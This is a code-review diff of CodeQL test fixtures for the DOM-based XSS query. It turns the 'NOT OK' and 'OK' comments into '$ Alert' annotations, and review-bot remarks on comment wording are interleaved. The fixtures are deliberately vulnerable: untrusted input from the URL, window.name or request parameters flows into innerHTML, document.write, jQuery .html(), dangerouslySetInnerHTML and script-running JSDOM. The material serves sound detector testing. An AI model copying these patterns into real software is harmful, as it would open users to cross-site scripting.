diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index 85ad5cef8d43..f9958ea20999 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -28,15 +28,15 @@ app.get("/some/path", function (req, res) { }; // OK + }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 08183d0db7e3..74c96fdae902 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -7,7 +7,6 @@ app.get('/some/path', function (req, res) { var taint = req.param("wobble"); jwt.verify(taint, 'my-secret-key', function (err, decoded) { - // NOT OK - new JSDOM(decoded.foo, { runScripts: "dangerously" }); + new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js index 7ead302724c3..59e96cb9d11e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js @@ -3,5 +3,5 @@ import $ from "jquery" $.post(loginUrl(), {data: "foo"}, (data, xhr) => { var decoded = jwt_decode(data); - $.jGrowl(decoded); // NOT OK - but only flagged with additional sources [INCONSISTENCY] + $.jGrowl(decoded); // $ MISSING: Alert - only flagged with additional sources }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js index 9091f93be7bb..f1fceadbf057 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js @@ -9,7 +9,7 @@ app.post('/private_message', (req, res) => { from: 'webmaster@example.com', to: backend.getUserEmail(req.query.receiver), subject: 'Private message', - text: `Hi, you got a message from someone. ${req.query.message}.`, // OK - html: `Hi, you got a message from someone. ${req.query.message}.`, // NOT OK + text: `Hi, you got a message from someone. ${req.query.message}.`, + html: `Hi, you got a message from someone. ${req.query.message}.`, // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index e8139936bc78..dcec3e388777 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js @@ -1,24 +1,24 @@ function test() { var target = document.location.search - $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); // OK + $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert var tainted = target; - $('myId').html(tainted); // NOT OK + $('myId').html(tainted); // $ Alert if (sanitize) { tainted = DOMPurify.sanitize(tainted); } - $('myId').html(tainted); // OK + $('myId').html(tainted); inner(target); function inner(x) { - $('myId').html(x); // NOT OK + $('myId').html(x); // $ Alert if (sanitize) { x = DOMPurify.sanitize(x); } - $('myId').html(x); // OK + $('myId').html(x); } } 
@@ -29,18 +29,18 @@ function badSanitizer() { return x; // No sanitization; } var tainted2 = target; - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert if (sanitize) { tainted2 = sanitizeBad(tainted2); } - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert var tainted3 = target; - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert if (sanitize) { tainted3 = sanitizeBad(tainted3); } - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert - $('myId').html(sanitize ? sanitizeBad(target) : target); // NOT OK + $('myId').html(sanitize ? sanitizeBad(target) : target); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index 66b7d65f669b..b60ca27e0e47 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx @@ -7,13 +7,13 @@ export default function Post(params) { return ( <>
    ) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 318007dacfa0..2e403f76ddae 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -5,6 +5,6 @@ var app = express(); app.get('/some/path', function(req, res) { let tainted = req.param("code"); - ; // NOT OK - ; // NOT OK + ; // $ Alert + ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js index 6d7e20ec6eb8..3811c6b2c964 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js @@ -7,13 +7,13 @@ function useMyContext() { export function useDoc1() { let { root } = useMyContext(); - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } class C extends Component { foo() { let { root } = this.context; - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js index 49d66634e5af..472f2026f1db 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js @@ -5,13 +5,13 @@ export function nextRouter() { return (
    { - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1 { - router.replace(router.query.foobar) // NOT OK + router.replace(router.query.foobar) // $ Alert }}>Click to XSS 2 { - router.push('/?foobar=' + router.query.foobar) // OK + router.push('/?foobar=' + router.query.foobar) }}>Safe Link
    ) @@ -20,7 +20,7 @@ export function nextRouter() { import { withRouter } from 'next/router' function Page({ router }) { - return router.push(router.query.foobar)}>Click to XSS 3 // NOT OK + return router.push(router.query.foobar)}>Click to XSS 3 // $ Alert } export const pageWithRouter = withRouter(Page); @@ -30,7 +30,7 @@ export function nextRouterWithLib() { return (
    { - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1
    ) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 672cd3bd6898..7bf77b18be10 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -2,25 +2,25 @@ import { useState } from 'react'; function initialState() { let [state, setState] = useState(window.name); - return
    ; // NOT OK + return
    ; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); setState(window.name); - return
    ; // NOT OK + return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(() => window.name); - return
    ; // NOT OK + return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(prev => { - document.body.innerHTML = prev; // NOT OK + document.body.innerHTML = prev; // $ Alert }) setState(() => window.name); } @@ -29,5 +29,5 @@ function setStateValueSafe() { let [state, setState] = useState('foo'); setState('safe'); setState(() => 'also safe'); - return
    ; // OK + return
    ; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 9d9fe6c80c97..3ece85044bb3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -15,35 +15,35 @@ function escapeAttr(s) { function test() { var tainted = window.name; var elt = document.createElement(); - elt.innerHTML = "" + escapeHtml(tainted) + ""; // OK - elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // NOT OK, but not flagged - [INCONSISTENCY] + elt.innerHTML = "" + escapeHtml(tainted) + ""; + elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // $ MISSING: Alert - not flagged - const regex = /[<>'"&]/; if (regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (!regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } if (regex.exec(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) != null) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) == null) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } - elt.innerHTML = tainted.replace(/<\w+/g, ''); // NOT OK + elt.innerHTML = tainted.replace(/<\w+/g, ''); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6c13ae8cc3e2..6ee44babf8bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js 
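Review bot: The rewritten expectation on the `escapeAttr(tainted)` line in sanitiser.js appears to end in a dangling ` -`, left over from dropping the `[INCONSISTENCY]` tag that followed the dash in the old comment. This line records a known false negative of the XSS query, so the comment should read cleanly, e.g. `// $ MISSING: Alert - not flagged`, or give the reason after the dash. Line breaks are collapsed here, so the trailing dash is inferred from the shape of the old comment; the body of `escapeAttr` lies outside the hunk.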
@@ -2,29 +2,29 @@ sessionStorage.setItem('session', document.location.search); localStorage.setItem('local', document.location.search); - $('myId').html(sessionStorage.getItem('session')); // NOT OK - $('myId').html(localStorage.getItem('session')); // OK - $('myId').html(sessionStorage.getItem('local')); // OK - $('myId').html(localStorage.getItem('local')); // NOT OK + $('myId').html(sessionStorage.getItem('session')); // $ Alert + $('myId').html(localStorage.getItem('session')); + $('myId').html(sessionStorage.getItem('local')); + $('myId').html(localStorage.getItem('local')); // $ Alert var href = localStorage.getItem('local'); - $('myId').html("foobar"); // NOT OK + $('myId').html("foobar"); // $ Alert if (href.indexOf("\"") !== -1) { return; } - $('myId').html(""); // OK + $('myId').html(""); var href2 = localStorage.getItem('local'); if (href2.indexOf("\"") !== -1) { return; } - $('myId').html("\nfoobar"); // OK + $('myId').html("\nfoobar"); var href3 = localStorage.getItem('local'); if (href3.indexOf("\"") !== -1) { return; } - $('myId').html('\r\n' + "something" + ''); // OK + $('myId').html('\r\n' + "something" + ''); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js index 91e122dee0f5..d20f88dba398 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js 
@@ -1,12 +1,12 @@ -document.write(document.location.href.charCodeAt(0)); // OK +document.write(document.location.href.charCodeAt(0)); -document.write(document.location); // NOT OK -document.write(document.location.href); // NOT OK -document.write(document.location.href.valueOf()); // NOT OK -document.write(document.location.href.sup()); // NOT OK -document.write(document.location.href.toUpperCase()); // NOT OK -document.write(document.location.href.trimLeft()); // NOT OK -document.write(String.fromCharCode(document.location.href)); // NOT OK -document.write(String(document.location.href)); // NOT OK -document.write(escape(document.location.href)); // OK (for now) -document.write(escape(escape(escape(document.location.href)))); // OK (for now) +document.write(document.location); // $ Alert +document.write(document.location.href); // $ Alert +document.write(document.location.href.valueOf()); // $ Alert +document.write(document.location.href.sup()); // $ Alert +document.write(document.location.href.toUpperCase()); // $ Alert +document.write(document.location.href.trimLeft()); // $ Alert +document.write(String.fromCharCode(document.location.href)); // $ Alert +document.write(String(document.location.href)); // $ Alert +document.write(escape(document.location.href)); // OK - for now +document.write(escape(escape(escape(document.location.href)))); // OK - for now diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js index a1feef0267a0..a823a6ce004f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js 
@@ -2,9 +2,9 @@ import 'dummy'; function foo(x, y, z) { arguments; // ensure 'arguments' are used - document.writeln(x); // OK - document.writeln(y); // NOT OK - document.writeln(z); // OK + document.writeln(x); + document.writeln(y); // $ Alert + document.writeln(z); } function bar() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index d030b30b1390..e1d26b45802d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -5,17 +5,17 @@ import ReactTooltip from 'react-tooltip'; function tooltips() { const source = window.name; return - // OK - // OK - // NOT OK - // NOT OK + + + // $ Alert + // $ Alert } function MyElement(props) { const provide = props.provide; - return
    ; // NOT OK + return
    ; // $ Alert } function useMyElement() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index 43ab0a02cf27..d57844a89f28 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -5,8 +5,7 @@ }; var target = document.location.search var searchParams = new URLSearchParams(target.substring(1)); - // NOT OK - $('original-term').html(searchParams.get('term')); - // OK + $('original-term').html(searchParams.get('term')); // $ Alert + $('translated-term').html(translate[searchParams.get('term')]); })(); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 7702768d6039..34eae2dc6a5b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js @@ -1,12 +1,12 @@ import * as lib from './trusted-types-lib'; -const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // NOT OK +const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert policy1.createHTML(window.name); -const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); // OK +const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); -const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); // OK +const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); 
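Review bot: In trusted-types.js the `policy1` and `policy3` declarations are now identical apart from `// $ Alert`, and with the `// OK` removed nothing explains why the second identity policy `createHTML: x => x` is expected to stay unflagged. The difference is only in the call that follows (`policy3.createHTML('safe')` versus `policy1.createHTML(window.name)`), so a reason comment would keep the negative case readable: `const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); // OK - only called with a constant`. The same applies to `policy2`, e.g. `// OK - createHTML ignores its input`.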
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index fea2063a4e3a..760edfa9ec8a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,144 +1,128 @@ function test() { var target = document.location.search - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert - // NOT OK - document.write(""); + document.write(""); // $ Alert document.write(""); - // NOT OK - $('
    '); + $('
    '); // $ Alert - $('
    '); // OK - $('
    '); // OK + $('
    '); + $('
    '); let params = (new URL(document.location)).searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); - $('name').html(searchParams.get('name')); // NOT OK + $('name').html(searchParams.get('name')); // $ Alert } function foo(target) { - // NOT OK - $('myId').html(target); + $('myId').html(target); // $ Alert } foo(document.location.search); function bar() { return document.location.search; } -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert function baz(x) { return x; } -// NOT OK -$('myId').html(baz(document.location.search)); +$('myId').html(baz(document.location.search)); // $ Alert function wrap(s) { return "
    " + s + "
    "; } -// NOT OK -$('myId').html(wrap(document.location.search)); +$('myId').html(wrap(document.location.search)); // $ Alert function chop(s) { if (s) return s.substr(1); return ""; } -// NOT OK -$('myId').html(chop(document.location.search)); -// NOT OK (duplicated to test precision of flow tracking) -$('myId').html(chop(document.location.search)); -// NOT OK -$('myId').html(wrap(chop(bar()))); +$('myId').html(chop(document.location.search)); // $ Alert +$('myId').html(chop(document.location.search)); // $ Alert - duplicated to test precision of flow tracking +$('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { - // NOT OK - $('myId').html(s); + $('myId').html(s); // $ Alert } dangerouslySetInnerHtml(document.location.search); dangerouslySetInnerHtml(document.location.search); -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert [,document.location.search].forEach(function(x) { if (x) - // NOT OK - $('myId').html(x); + $('myId').html(x); // $ Alert }); -// NOT OK -let s = ; +let s = ; // $ Alert angular.module('myApp', []) .service("myService", function($sce, $other) { - $sce.trustAsHtml(document.location.search); // NOT OK - $sce.trustAsCss(document.location.search); // NOT OK - $sce.trustAsUNKNOWN(document.location.search); // OK - $sce.trustAs($sce.HTML, document.location.search); // NOT OK - $sce.trustAs($sce.CSS, document.location.search); // NOT OK - $sce.trustAs(UNKNOWN, document.location.search); // OK - $other.trustAsHtml(document.location.search); // OK + $sce.trustAsHtml(document.location.search); // $ Alert + $sce.trustAsCss(document.location.search); // $ Alert + $sce.trustAsUNKNOWN(document.location.search); + $sce.trustAs($sce.HTML, document.location.search); // $ Alert + $sce.trustAs($sce.CSS, document.location.search); // $ Alert + $sce.trustAs(UNKNOWN, document.location.search); + $other.trustAsHtml(document.location.search); }) .service("myService2", function() { - angular.element('
    ').html(document.location.search); // NOT OK - angular.element('
    ').html('SAFE'); // OK + angular.element('
    ').html(document.location.search); // $ Alert + angular.element('
    ').html('SAFE'); }) .directive('myCustomer', function() { return { link: function(scope, element){ - element.html(document.location.search); // NOT OK - element.html('SAFE'); // OK + element.html(document.location.search); // $ Alert + element.html('SAFE'); } }; }) .service("myService3", function() { - angular.element(document.location.search); // NOT OK - angular.element('SAFE'); // OK + angular.element(document.location.search); // $ Alert + angular.element('SAFE'); }) function tst() { var v = document.location.search.substr(1); - // NOT OK - document.write(v); + document.write(v); // $ Alert if (/^\d+$/.test(v)) { - // OK + document.write(v); } if ((m = /^\d+$/.exec(v))) { - // OK + document.write(v); } if (v.match(/^\d+$/)) { - // OK + document.write(v); } if (v.match("^\\d+$")) { - // OK + document.write(v); } if (!(/\d+/.test(v))) // not effective - matches "123" return; - // NOT OK - document.write(v); + document.write(v); // $ Alert if (!(/^\d+$/.test(v))) return; - // OK + document.write(v); } @@ -148,11 +132,11 @@ function angularJSServices() { xssSinkService1(window.location.search); }]) .factory("xssSinkService1", function(){ - return function(v){ $("
    ").html(v); } // NOT OK + return function(v){ $("
    ").html(v); } // $ Alert }) .factory("xssSource_from_service", ["xssSourceService", function(xssSourceService){ - $("
    ").html(xssSourceService()); // NOT OK + $("
    ").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ return function() { return window.location.search }; @@ -162,11 +146,11 @@ function angularJSServices() { xssSinkService2("innocent"); }]) .factory("xssSinkService2", function(){ - return function(v){ $("
    ").html(v); } // OK + return function(v){ $("
    ").html(v); } }) .factory("innocentSource_from_service", ["innocentSourceService", function(innocentSourceService){ - $("
    ").html(innocentSourceService()); // OK + $("
    ").html(innocentSourceService()); }]) .factory("innocentSourceService", function(){ return function() { return "innocent" }; @@ -177,27 +161,27 @@ function testDOMParser() { var target = document.location.search var parser = new DOMParser(); - parser.parseFromString(target, "application/xml"); // NOT OK + parser.parseFromString(target, "application/xml"); // $ Alert } function references() { var tainted = document.location.search; - document.body.innerHTML = tainted; // NOT OK + document.body.innerHTML = tainted; // $ Alert - document.createElement().innerHTML = tainted; // NOT OK - createElement().innerHTML = tainted; // NOT OK + document.createElement().innerHTML = tainted; // $ Alert + createElement().innerHTML = tainted; // $ Alert - document.getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName().item().innerHTML = tainted; // NOT OK + document.getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName().item().innerHTML = tainted; // $ Alert } function react(){ var tainted = document.location.search; - React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK - React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK + React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert + React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert class C1 extends React.Component { constructor() { 
@@ -209,26 +193,26 @@ function react(){ } test() { - $('myId').html(this.state.tainted1); // NOT OK - $('myId').html(this.state.tainted2); // NOT OK - $('myId').html(this.state.tainted3); // NOT OK - $('myId').html(this.state.notTainted); // OK + $('myId').html(this.state.tainted1); // $ Alert + $('myId').html(this.state.tainted2); // $ Alert + $('myId').html(this.state.tainted3); // $ Alert + $('myId').html(this.state.notTainted); this.setState(prevState => { - $('myId').html(prevState.tainted4) // NOT OK + $('myId').html(prevState.tainted4) // $ Alert }); } } class C2 extends React.Component { test() { - $('myId').html(this.props.tainted1); // NOT OK - $('myId').html(this.props.tainted2); // NOT OK - $('myId').html(this.props.tainted3); // NOT OK - $('myId').html(this.props.notTainted); // OK + $('myId').html(this.props.tainted1); // $ Alert + $('myId').html(this.props.tainted2); // $ Alert + $('myId').html(this.props.tainted3); // $ Alert + $('myId').html(this.props.notTainted); this.setState((prevState, prevProps) => { - $('myId').html(prevProps.tainted4) // NOT OK + $('myId').html(prevProps.tainted4) // $ Alert }); } } @@ -256,28 +240,28 @@ function react(){ } function windowName() { - $(window.name); // NOT OK - $(name); // NOT OK + $(window.name); // $ Alert + $(name); // $ Alert } function windowNameAssigned() { for (name of ['a', 'b']) { - $(window.name); // NOT OK - $(name); // OK + $(window.name); // $ Alert + $(name); } } function jqueryLocation() { - $(location); // OK - $(window.location); // OK - $(document.location); // OK + $(location); + $(window.location); + $(document.location); var loc1 = location; var loc2 = window.location; var loc3 = document.location; - $(loc1); // OK - $(loc2); // OK - $(loc3); // OK + $(loc1); + $(loc2); + $(loc3); - $("body").append(location); // NOT OK + $("body").append(location); // $ Alert } 
@@ -285,7 +269,7 @@ function testCreateContextualFragment() { var tainted = window.name; var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); - var documentFragment = range.createContextualFragment(tainted); // NOT OK + var documentFragment = range.createContextualFragment(tainted); // $ Alert document.body.appendChild(documentFragment); } @@ -293,14 +277,14 @@ function flowThroughPropertyNames() { var obj = {}; obj[Math.random()] = window.name; for (var p in obj) - $(p); // OK + $(p); } function basicExceptions() { try { throw location; } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } try { @@ -308,18 +292,18 @@ function basicExceptions() { throw location } finally {} } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } } function handlebarsSafeString() { - return new Handlebars.SafeString(location); // NOT OK! + return new Handlebars.SafeString(location); // $ Alert } function test2() { var target = document.location.search - // OK + $('myId').html(target.length) } @@ -329,10 +313,10 @@ function getTaintedUrl() { function URLPseudoProperties() { let params = getTaintedUrl().searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert let myUrl = getTaintedUrl(); - $('name').html(myUrl.get('name')); // OK (.get is not defined on a URL) + $('name').html(myUrl.get('name')); // OK - .get is not defined on a URL } 
@@ -340,27 +324,27 @@ function hash() { function getUrl() { return new URL(document.location); } - $(getUrl().hash.substring(1)); // NOT OK + $(getUrl().hash.substring(1)); // $ Alert } function growl() { var target = document.location.search - $.jGrowl(target); // NOT OK + $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { var target = document.location.search - this.html(target); // NOT OK. (this is a jQuery object) - this.innerHTML = target // OK. (this is a jQuery object) + this.html(target); // $ Alert - this is a jQuery object + this.innerHTML = target // OK - this is a jQuery object this.each(function (i, e) { - this.innerHTML = target; // NOT OK. (this is a DOM-node); - this.html(target); // OK. (this is a DOM-node); + this.innerHTML = target; // $ Alert - (this is a DOM-node); + this.html(target); // OK - (this is a DOM-node); - e.innerHTML = target; // NOT OK. + e.innerHTML = target; // $ Alert }); } $.fn[pluginName] = myPlugin; @@ -370,8 +354,7 @@ function thisNodes() { function test() { var target = document.location.search - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert // OK - but only safe because contents are URI-encoded $('myid').html(document.location.href.split("?")[0]); 
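Review bot: The converted comments in `thisNodes` are inconsistent: the jQuery-object lines read `// $ Alert - this is a jQuery object`, while the DOM-node lines keep the old parentheses and a stray semicolon, `// $ Alert - (this is a DOM-node);` and `// OK - (this is a DOM-node);`. I would normalise them to `// $ Alert - this is a DOM node` and `// OK - this is a DOM node`, so the reason for each expectation (which receiver type makes `.html()` or `.innerHTML` a sink) reads the same way throughout. `thisNodes` continues past the end of this hunk.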
@@ -381,68 +364,68 @@ function test() { var target = document.location.search - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert - $('myId').html(target.taint); // NOT OK + $('myId').html(target.taint); // $ Alert target.taint2 = 2; - $('myId').html(target.taint2); // OK + $('myId').html(target.taint2); target.taint3 = document.location.search; - $('myId').html(target.taint3); // NOT OK + $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 - $('myId').html(target.sub.taint4); // OK + $('myId').html(target.sub.taint4); - $('myId').html(target.taint5); // NOT OK + $('myId').html(target.taint5); // $ Alert target.taint5 = "safe"; target.taint6 = 2; if (random()) {return;} - $('myId').html(target.taint6); // OK + $('myId').html(target.taint6); if (random()) {target.taint7 = "safe";} - $('myId').html(target.taint7); // NOT OK + $('myId').html(target.taint7); // $ Alert target.taint8 = target.taint8; - $('myId').html(target.taint8); // NOT OK + $('myId').html(target.taint8); // $ Alert target.taint9 = (target.taint9 = "safe"); - $('myId').html(target.taint9); // OK + $('myId').html(target.taint9); } function hash2() { var payload = window.location.hash.substr(1); - document.write(payload); // NOT OK + document.write(payload); // $ Alert let match = window.location.hash.match(/hello (\w+)/); if (match) { - document.write(match[1]); // NOT OK + document.write(match[1]); // $ Alert } - document.write(window.location.hash.split('#')[1]); // NOT OK + document.write(window.location.hash.split('#')[1]); // $ Alert } function nonGlobalSanitizer() { var target = document.location.search - $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // NOT OK + $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert - $("#foo").html(target.replace(/<|>/g, '')); // OK + $("#foo").html(target.replace(/<|>/g, '')); } function mootools(){ var source = document.location.search; - new Element("div"); // OK - new Element("div", {text: 
source}); // OK - new Element("div", {html: source}); // NOT OK - new Element("div").set("html", source); // NOT OK - new Element("div").set({"html": source}); // NOT OK - new Element("div").setProperty("html", source); // NOT OK - new Element("div").setProperties({"html": source}); // NOT OK - new Element("div").appendHtml(source); // NOT OK + new Element("div"); + new Element("div", {text: source}); + new Element("div", {html: source}); // $ Alert + new Element("div").set("html", source); // $ Alert + new Element("div").set({"html": source}); // $ Alert + new Element("div").setProperty("html", source); // $ Alert + new Element("div").setProperties({"html": source}); // $ Alert + new Element("div").appendHtml(source); // $ Alert } 
